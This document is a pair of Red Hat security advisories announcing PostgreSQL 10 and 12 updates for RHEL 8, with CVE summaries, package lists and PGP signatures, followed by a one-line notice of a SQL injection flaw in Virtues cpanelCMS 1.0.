Red Hat Security Advisory 2023-4539-01 - PostgreSQL is an advanced object-relational database management system.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: postgresql:10 security update  
Advisory ID:       RHSA-2023:4539-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4539  
Issue date:        2023-08-08  
CVE Names:         CVE-2023-2454 CVE-2023-2455   
=====================================================================

1. Summary:

An update for the postgresql:10 module is now available for Red Hat  
Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

PostgreSQL is an advanced object-relational database management system  
(DBMS).

Security Fix(es):

* postgresql: schema_element defeats protective search_path changes  
(CVE-2023-2454)

* postgresql: row security policies disregard user ID changes after  
inlining. (CVE-2023-2455)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

If the postgresql service is running, it will be automatically restarted  
after installing this update.

5. Bugs fixed (https://bugzilla.redhat.com/):

2207568 - CVE-2023-2454 postgresql: schema_element defeats protective search_path changes  
2207569 - CVE-2023-2455 postgresql: row security policies disregard user ID changes after inlining.

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
postgresql-10.23-2.module+el8.8.0+19493+5804baf6.src.rpm

aarch64:  
postgresql-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-contrib-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-contrib-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-debugsource-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-docs-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-docs-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-plperl-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-plperl-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-plpython3-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-plpython3-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-pltcl-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-pltcl-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-server-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-server-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-server-devel-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-server-devel-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-static-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-test-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-test-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-test-rpm-macros-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-upgrade-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-upgrade-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-upgrade-devel-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm  
postgresql-upgrade-devel-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.aarch64.rpm

ppc64le:  
postgresql-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-contrib-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-contrib-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-debugsource-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-docs-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-docs-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-plperl-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-plperl-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-plpython3-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-plpython3-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-pltcl-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-pltcl-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-server-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-server-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-server-devel-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-server-devel-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-static-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-test-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-test-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-test-rpm-macros-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-upgrade-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-upgrade-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-upgrade-devel-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm  
postgresql-upgrade-devel-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.ppc64le.rpm

s390x:  
postgresql-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-contrib-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-contrib-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-debugsource-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-docs-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-docs-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-plperl-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-plperl-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-plpython3-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-plpython3-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-pltcl-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-pltcl-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-server-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-server-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-server-devel-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-server-devel-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-static-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-test-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-test-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-test-rpm-macros-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-upgrade-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-upgrade-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-upgrade-devel-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm  
postgresql-upgrade-devel-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.s390x.rpm

x86_64:  
postgresql-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-contrib-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-contrib-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-debugsource-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-docs-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-docs-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-plperl-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-plperl-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-plpython3-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-plpython3-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-pltcl-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-pltcl-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-server-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-server-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-server-devel-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-server-devel-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-static-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-test-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-test-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-test-rpm-macros-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-upgrade-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-upgrade-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-upgrade-devel-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm  
postgresql-upgrade-devel-debuginfo-10.23-2.module+el8.8.0+19493+5804baf6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-2454  
https://access.redhat.com/security/cve/CVE-2023-2455  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk0k9SAAoJENzjgjWX9erEWZwQAJOWdstLJGeVEYwuTlEtXxLz  
mvKaCqsr7YhticWwVKt9eb6L5uFZch7ss+Wdxwj+5rm9jN1EWSbzCoJeiNHaonlJ  
5/XKIVoUUTwfKQ0TJTJCYXxFSzds+ClVcTj/VNk270KdSmS5GbpwrMKlgbqBI7YM  
qtQh0hMZZ7sTL802uU77H+4ocxfFPxLRuZeCZ2U0ULAx7ur3ZVKVNi+rj9hCyPSJ  
2rI9q8LEIZWLTFzs+3kTGCGQlBtJJrv1mQonhoSET3r8UJyujrHQtbpVE8b3MQA4  
X/rqdU6+QxhOtI8WdT1mpbDt9VFCIE5rbhP6vpK7/gK8nxH5yfOLB1nDRKlLCtyF  
qJRxqXxQvcOgsrs5QXOJsaxVrA5A8qdRsjqP+CxKdWRVVIyQ29JXoRq64K3leiQ3  
cR879poIpoh38hkrqmmeHLJqOREbsEbQqL3DCyaN46rjQ5MyWGFTV+7JNW17p+dc  
JC2yUAnU1LTMyND/WFRcgrcwiEAruF9SQMkuaV3qTZOUiafirA0CzkcaJEh9ycxV  
2ehVP4gPTHRNFS8xIvq7Ely/LzmZqV+0834CSU01cg9oeP5Kacd03Y4Rf2cR6ZMO  
j5ykLcGE0SKKkvtmCS4xgzqxPCjoaEG+nps+z7363dFsOpd0kNx/OasRjG999DtD  
WMJ6qw0/JPLVFgEKNMie  
=Njbj  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4539-01

Red Hat Security Advisory 2023-4535-01 - PostgreSQL is an advanced object-relational database management system.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: postgresql:12 security update  
Advisory ID:       RHSA-2023:4535-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4535  
Issue date:        2023-08-08  
CVE Names:         CVE-2022-41862 CVE-2023-2454 CVE-2023-2455   
=====================================================================

1. Summary:

An update for the postgresql:12 module is now available for Red Hat  
Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

PostgreSQL is an advanced object-relational database management system  
(DBMS).

Security Fix(es):

* postgresql: schema_element defeats protective search_path changes  
(CVE-2023-2454)

* postgresql: row security policies disregard user ID changes after  
inlining. (CVE-2023-2455)

* postgresql: Client memory disclosure when connecting with Kerberos to  
modified server (CVE-2022-41862)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

If the postgresql service is running, it will be automatically restarted  
after installing this update.

5. Bugs fixed (https://bugzilla.redhat.com/):

2165722 - CVE-2022-41862 postgresql: Client memory disclosure when connecting with Kerberos to modified server  
2207568 - CVE-2023-2454 postgresql: schema_element defeats protective search_path changes  
2207569 - CVE-2023-2455 postgresql: row security policies disregard user ID changes after inlining.

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
pg_repack-1.4.6-3.module+el8.5.0+11354+78b3c9c5.src.rpm  
pgaudit-1.4.0-5.module+el8.5.0+11354+78b3c9c5.src.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.5.0+11354+78b3c9c5.src.rpm  
postgresql-12.15-1.module+el8.8.0+19427+d1071523.src.rpm

aarch64:  
pg_repack-1.4.6-3.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
pg_repack-debuginfo-1.4.6-3.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
pg_repack-debugsource-1.4.6-3.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
pgaudit-1.4.0-5.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
pgaudit-debuginfo-1.4.0-5.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
pgaudit-debugsource-1.4.0-5.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.5.0+11354+78b3c9c5.aarch64.rpm  
postgresql-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-contrib-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-contrib-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-debugsource-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-docs-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-docs-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-plperl-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-plperl-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-plpython3-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-plpython3-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-pltcl-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-pltcl-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-server-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-server-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-server-devel-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-server-devel-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-static-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-test-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-test-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-upgrade-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-upgrade-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-upgrade-devel-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm  
postgresql-upgrade-devel-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.aarch64.rpm

noarch:  
postgresql-test-rpm-macros-12.15-1.module+el8.8.0+19427+d1071523.noarch.rpm

ppc64le:  
pg_repack-1.4.6-3.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
pg_repack-debuginfo-1.4.6-3.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
pg_repack-debugsource-1.4.6-3.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
pgaudit-1.4.0-5.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
pgaudit-debuginfo-1.4.0-5.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
pgaudit-debugsource-1.4.0-5.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.5.0+11354+78b3c9c5.ppc64le.rpm  
postgresql-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-contrib-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-contrib-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-debugsource-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-docs-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-docs-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-plperl-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-plperl-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-plpython3-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-plpython3-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-pltcl-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-pltcl-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-server-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-server-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-server-devel-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-server-devel-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-static-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-test-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-test-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-upgrade-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-upgrade-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-upgrade-devel-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm  
postgresql-upgrade-devel-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.ppc64le.rpm

s390x:  
pg_repack-1.4.6-3.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
pg_repack-debuginfo-1.4.6-3.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
pg_repack-debugsource-1.4.6-3.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
pgaudit-1.4.0-5.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
pgaudit-debuginfo-1.4.0-5.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
pgaudit-debugsource-1.4.0-5.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.5.0+11354+78b3c9c5.s390x.rpm  
postgresql-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-contrib-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-contrib-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-debugsource-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-docs-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-docs-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-plperl-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-plperl-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-plpython3-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-plpython3-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-pltcl-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-pltcl-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-server-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-server-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-server-devel-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-server-devel-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-static-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-test-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-test-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-upgrade-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-upgrade-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-upgrade-devel-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm  
postgresql-upgrade-devel-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.s390x.rpm

x86_64:  
pg_repack-1.4.6-3.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
pg_repack-debuginfo-1.4.6-3.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
pg_repack-debugsource-1.4.6-3.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
pgaudit-1.4.0-5.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
pgaudit-debuginfo-1.4.0-5.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
pgaudit-debugsource-1.4.0-5.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.5.0+11354+78b3c9c5.x86_64.rpm  
postgresql-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-contrib-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-contrib-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-debugsource-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-docs-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-docs-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-plperl-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-plperl-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-plpython3-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-plpython3-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-pltcl-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-pltcl-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-server-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-server-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-server-devel-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-server-devel-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-static-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-test-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-test-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-upgrade-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-upgrade-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-upgrade-devel-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm  
postgresql-upgrade-devel-debuginfo-12.15-1.module+el8.8.0+19427+d1071523.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-41862  
https://access.redhat.com/security/cve/CVE-2023-2454  
https://access.redhat.com/security/cve/CVE-2023-2455  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk0k9CAAoJENzjgjWX9erEE1sP+wTqIUW8IoSarpOGvtnKOyF2  
bi5RtyUYPYuhIqaKCK2UsPG3nDm22Icm+BGg4DlyVKm7nDNOEqn9zZ5yVIhhdj6u  
Y3XgfCQ73qIp4S5Kk2/EamjkW+qApav//KwvtYsAKnRSdehnsoPITXyrP6CvNecq  
nDstngk4YXYZmSSWf9+G4qcrW2KYE9ZXb3Y9neDlps+tllMHtCkDll/yovbCsDAl  
TmvUC/rspIlQT0ORUtzbDF6UxbxRNObshQb8eIv/5dEEFi0vhpaBHSEc02qkAmwt  
YEUK6PmOuMnG+t2MmY9qU2JIAWIolhj1mrW+9t0QEtQwnRe3WAdC/u6L6Y8A+Vaq  
su0qGiDIzxucA9GEZaLEwcgFF0oHQGy1bAlosmrfd72J22c1CrGLhUalHX48OC/K  
Uvi1hQjtldMkfjPPcFf1HAQQxdHdmPciYfAGK4cNQtSN2BDTxmXbqZ88MI/K40OZ  
ljQ33r0vAY5JT92wK9H2ywPPua8hvyfwPx3kCRWjkyJRi+pYUlmDMFfnl0bRQPdF  
Kg82S2EgDFm1UJ5+FKQYsG1DiWrpyKn5A2QaNzTdJRSHME7y2AwlrDWyYZs8RRPT  
UMURHrR5A5m0PLrdBTCfHb9HntQ2llqqdzGnD18AcU/gAUBxWfTSR9Xwa9g4QVHQ  
rsj1k41v/v4CYSXYiSOq  
=VOC5  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4535-01

Virtues cpanelCMS version 1.0 suffers from a remote SQL injection vulnerability.

